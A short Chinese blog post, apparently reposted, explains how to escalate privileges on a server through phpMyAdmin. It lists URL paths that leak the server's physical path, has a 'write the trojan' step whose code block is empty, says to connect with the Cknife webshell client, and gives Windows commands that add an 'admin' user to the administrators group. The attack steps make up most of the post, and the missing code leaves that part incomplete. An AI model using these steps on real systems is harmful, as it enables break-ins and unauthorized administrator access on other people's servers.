本文摘自PHP中文网,作者藏色散人,侵删。
下面由phpmyadmin教程栏目给大家介绍利用phpMyAdmin提权的方法,希望对需要的朋友有所帮助!利用phpMyAdmin提权
爆路径
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpMyAdmin/index.php?lang[]=1
- /phpMyAdmin/phpinfo.php
- /load_file()
- /phpmyadmin/themes/darkblue_orange/layout.inc.php
- /phpmyadmin/libraries/select_lang.lib.php
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpmyadmin/libraries/mcrypt.lib.php
得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php
写马
1 2 3 4 |
|
获得webshell
最后用Cknife连接,创建帐户并添加到管理员用户组net user admin admin /add
net localgroup administrator admin /add
以上就是怎么利用phpMyAdmin提权的详细内容,更多文章请关注木庄网络博客!
相关阅读 >>
更多相关阅读请进入《phpMyAdmin》频道 >>
数据库系统概念 第6版
本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。